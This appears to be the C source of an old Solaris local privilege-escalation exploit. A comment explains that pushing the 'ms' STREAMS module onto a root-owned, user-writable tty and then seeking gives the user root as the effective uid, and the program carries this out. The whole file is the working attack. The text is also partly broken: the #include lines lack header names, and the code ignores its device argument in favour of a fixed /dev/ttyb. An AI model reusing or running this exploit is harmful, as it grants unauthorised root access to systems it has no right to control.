/* Information for this security problem was obtained from Shawn Instenes who claims he got it from some engineers at Sun. He said that a patch existed for 2.4 but not 2.3. I was unable to find a patch for 2.4 or 2.3. If a tty port that is writeable by the user and owned by root is opened and the I_PUSH "ms" ioctl call made followed by an lseek the effective uid of the user is changed to root. */ #include #include #include #include #include #include #include main(argc, argv) int argc; char* argv[]; { int fd; if (argc < 2) { fprintf(stderr, "usage: %s /dev/ttyX\n", argv[0]); exit(1); } fd = open("/dev/ttyb", O_RDWR); printf("Your current effective uid is %d\n", geteuid()); ioctl(fd, I_PUSH, "ms"); lseek(fd, 0, 1); printf("Your effective uid has been changed to %d\n", geteuid()); }